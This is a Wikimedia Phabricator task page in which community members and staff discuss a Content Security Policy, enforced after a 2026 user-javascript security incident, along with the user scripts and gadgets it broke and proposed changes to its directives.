Page MenuHomePhabricator

CSP adjustments related to the 2026 user javascript incident
Open, Needs TriagePublic

Description

Parent task to track issues related to enforcing CSP as a result of the 2026-user-javascript-incident (T419137, T419154)

Related Objects

StatusSubtypeAssignedTask
OpenNone
ResolvedBUG REPORTsbassett
ResolvedBUG REPORTNone
ResolvedBUG REPORTsbassett
ResolvedBUG REPORTNone
ResolvedBUG REPORTsbassett
ResolvedBUG REPORTNone
Resolvedsbassett
InvalidBUG REPORTNone
ResolvedBUG REPORTsbassett
ResolvedBUG REPORTsbassett
Resolvedsbassett
ResolvedBUG REPORTsbassett
ResolvedBUG REPORTsbassett
ResolvedBUG REPORTsbassett
OpenNone
Resolvedsbassett
Resolvedsbassett
ResolvedBUG REPORTsbassett
ResolvedBUG REPORTsbassett
ResolvedFeaturesbassett
ResolvedBUG REPORTsbassett
Resolvedsbassett
Resolvedsbassett
DeclinedNone
OpenBUG REPORTNone
ResolvedBUG REPORTsbassett
OpenNone

Event Timeline

There are a very large number of changes, so older changes are hidden. Show Older Changes
A_smart_kitten subscribed.

Short notice, but IMO this might be worth an entry in this week's Tech/News, to e.g. encourage folks to file Phab tasks for broken scripts caused by the CSP changes.

(edit: if it's too late for this week's Tech/News, next-week's Tech/News)

Change #1249348 had a related patch set uploaded (by SBassett; author: SBassett):

[operations/puppet@production] Allow-list some additional domains to the currently enforcing CSP

https://gerrit.wikimedia.org/r/1249348

Change #1249348 merged by Scott French:

[operations/puppet@production] Allow-list some additional domains to the currently enforcing CSP

https://gerrit.wikimedia.org/r/1249348

How about official haproxy on toolforge that would allow adding new rules? Seems like e.g. T419232: CSP blocks access to iiif.archive.org; breaks script for pulling high-resolution scans from archive.org (for use at Wikisource) would be better implemented via proxy (the user insisted only specific .json call should be possible).

This may be an alternative solution (Toolforge proxy to 3rd party resources) to potentially endlessly growing CSP list, and this also prevents PII be leaked to 3rd party. However, many websites run under Cloudflare and may work poorly with reverse proxy.

Hi. I was wondering where to write about this, but the problem is mostly generic and this task is generic. So hopefully this is the right place.

I think having everything in default-src is not great. I mean, I don't really know why everything is in default-src, perhaps it is somehow justified, but to my knowledge, this is not a typical usage of CSP.

  • The most restrictive rule should normally be script-src, but on Wikimedia sites that would not be possible (wikis have a rather specific scripting model). So most of what is in default-src should probably just be in script-src.
  • connect-src is just for fetching stuff. Most of the time this should not be blocked too much. You might want to restrict it to https: and add some http: exceptions, or just allow http:, which should block WebSockets. At a glance, it seems like most tasks might just be about fetching data (like those about requesting JSON from IIIF).
  • style-src should probably be mostly unrestricted. Even though you can do a keylogger in CSS, it is not really feasible (even a simple PoC is very large), and user scripts are not loaded on login pages, so keyloggers are not really a problem (most data on wikis is public).
  • You should probably add worker-src 'none';. Since MW is not using workers, it would be best not to risk someone finding a way to register a worker.
  • For frame-src: 'self', *.toolforge.org (e.g. maps), *.wikimedia.org, *.wikipedia.org.
  • For frame-ancestors 'self'; if you want to prevent clickjacking. Though that might break some flows and some mobile apps.
  • For non-active resources I would probably use img-src * data:; and font-src * data:;.

So to summarise, I think the rules are not restrictive enough where they should be (script-src) and too restrictive in other places. Without changing anything else you could probably add:
connect-src http:; font-src * data:; img-src * data:; worker-src 'none';

Though in a company I worked for, we tested CSP in report-only mode for a month or two and added the proper CSP after that. Note that if you block frames, some sniffing frames from e.g. Kaspersky will also be blocked (we had quite a lot of that from schools).

connect-src

I don't think making it so broad is good since malicious scripts can just fetch other scripts anywhere and eval it, bypassing script-src. Imagining that we are connecting to a hacker's command and control server.

worker-src

We have a security task for that and it should be discussed there.

Note any sorts of external resource has risk of compromising privacy (3rd party website can know time, IPs and User-Agents of any, or for scripts used by a few people, specific, users using Wikimedia project), so blinding allowing any website is bad.

Note any sorts of external resource has risk of compromising privacy (3rd party website can know time, IPs and User-Agents of any, or for scripts used by a few people, specific, users using Wikimedia project), so blinding allowing any website is bad.

That's not blindly, that's just community driven.

You should probably add worker-src 'none';. Since MW is not using workers, it would be best not to risk someone finding a way to register a worker.

I stand corrected. There are already wrokers in use. Did a search and it seem to mostly come from JWB copies (AWB in browser). Looking at the code briefly I don't see why would it need to be in a worker (don't see any real benefits and I do almost the same things in my WP:SK code cleanup tool and much, much more).

https://global-search.toolforge.org/?q=%28new+Worker%7Cnew+SharedWorker%7CserviceWorker%5C.%29&regex=1&namespaces=2%2C8&title=.%2B%5C.js

In any case removing Worker support, as it is already used, should be worked out with the community. I mean someone should talk to Joey amongst other. I don't really see the need of secrecy here. The security threats and privacy threats I guess might be new to some WMF staff, but is not new to the larger community around Wikimedia. Typically before script is used someone is analysing it. After testing (sometimes for weeks) it might become a gadget. In most cases scripts go through many eyes. I would say way more eyes then many random npm script and you already allow *.jsdelivr.net.

Hi. I was wondering where to write about this, but the problem is mostly generic and this task is generic. So hopefully this is the right place.

I think having everything in default-src is not great. I mean, I don't really know why everything is in default-src, perhaps it is somehow justified, but to my knowledge, this is not a typical usage of CSP...

This is an appropriate task to discuss these issues. To be clear, the current enforcing CSP on Wikimedia projects is very much a transitional policy. Unfortunately, due to the recent security incident, we needed to deploy this policy sooner than we had anticipated and without the communications we had intended to publish in parallel. And for this, we are of course, extremely apologetic to the Community, and are working to address various user and site javascript breakages via this task. We hope to have some updated communications about this work (which had been initially tied to a Product and Technology hypothesis for the current Annual Plan) published soon. This will include more details regarding future CSP-related tuning and deployments.

Short notice, but IMO this might be worth an entry in this week's Tech/News, to e.g. encourage folks to file Phab tasks for broken scripts caused by the CSP changes.

(edit: if it's too late for this week's Tech/News, next-week's Tech/News)

UOzurumba moved this task from To Triage to Not ready to announce on the User-notice board.

I defer to WMF folks on when this should have a notice about it published in Tech/News (if e.g. there are reasons to delay one that I'm not aware about); but IMO it might be worth including such a notice sooner rather than later.

Is it possible to generate a list of requested domains that are being blocked by the CSP, in some browsable way?

Rather than requiring every tool-user to figure out how to find phab and report the problem, we should be able to track down which tools are still blocked and proactively unbreak ones that are pinging trusted domains or using otherwise known services; or at the least reach out to tool-maintainers whose tools are broken to streamline a resolution.

Is it possible to generate a list of requested domains that are being blocked by the CSP, in some browsable way?

When I attempt to make a request that gets blocked by the CSP, my browser pings (e.g.) https://en.wikipedia.org/w/api.php?action=cspreport&format=json with some details (including the URI that was blocked). So it seems like the data may be there, so potentially generating this sort of list may be possible (at least in theory).

Is it possible to generate a list of requested domains that are being blocked by the CSP, in some browsable way?

Rather than requiring every tool-user to figure out how to find phab and report the problem, we should be able to track down which tools are still blocked and proactively unbreak ones that are pinging trusted domains or using otherwise known services; or at the least reach out to tool-maintainers whose tools are broken to streamline a resolution.

Yes, see T335892 for overall statistics of all the WMF wikis, and F55305255 for a list of affected gadgets. Both lists are 2 year old at this point, and do include pages that have url's in comments, so they are too big if anything.

Thanks @Snaevar. Updated versions of those lists (maybe just the gadgets list with usage stats) would address the use I had in mind.

Is it possible to generate a list of requested domains that are being blocked by the CSP, in some browsable way?

Rather than requiring every tool-user to figure out how to find phab and report the problem, we should be able to track down which tools are still blocked and proactively unbreak ones that are pinging trusted domains or using otherwise known services; or at the least reach out to tool-maintainers whose tools are broken to streamline a resolution.

I realize this may sound a little cold, but we're not interested in proactively fixing all broken user scripts and gadgets. We did do significant work over the last couple months to measure (through incoming CSP reports) what scripts were causing a high volume of activity and whose breakage would be significant. That is what led us to include many domains out the gate in the original enforcing CSP we put up post-incident. So the remaining broken user scripts are ones whose volume was low enough that it didn't register a lot of volume in advance.

Volume isn't the only measure of impact, of course. But another signal is whether breakage is causing enough of real-world disruption to active users for someone to file a Phab ticket to request it. We have accommodated almost all of the Phab requests people have made for their broken user scripts, and probably will continue to for a little while yet before we begin focusing on working with people to whittle the list back down.

We are about to publish (very imminently) a project page on mediawiki.org about our work securing user-managed code, including FAQs about CSP and the incident that tell people with broken user scripts to open a Phab task. But we're otherwise not really going out of our way to ask people to ask.

Hello, I tried to make a request from an en.wikipedia.org page and fetch("https://petscan.wmcloud.org/...") succeeds under the current enforced CSP, but it triggers a Content-Security-Policy-Report-Only warning because *.wmcloud.org is missing from the report-only policy.

I am designing a gadget that will make a request to one of the allowed hosts in the CSP! Can you clarify whether *.wmcloud.org are intended to remain allowed in the enforced CSP long-term, or whether the report-only policy is expected to become stricter in a way that would block these requests later?

I am designing a gadget that will make a request to one of the allowed hosts in the CSP! Can you clarify whether *.wmcloud.org are intended to remain allowed in the enforced CSP long-term, or whether the report-only policy is expected to become stricter in a way that would block these requests later?

The report-only policy was set up to help us measure the volume of requests to different hosts - it's not there strictly to trial run exclusions. I'm not saying that WCMS and Toolforge are going to be permanently allowed until the end of time, but we don't have plans to remove them right now and anything that significant would involve a lot more coordination.

We put up an FAQ about our CSP, as part of a project page describing the overall initiative, which recommends considering Toolforge as an alternative for direct 3P linking. Hopefully the page helps give you some idea of where our work is headed in the near to medium term.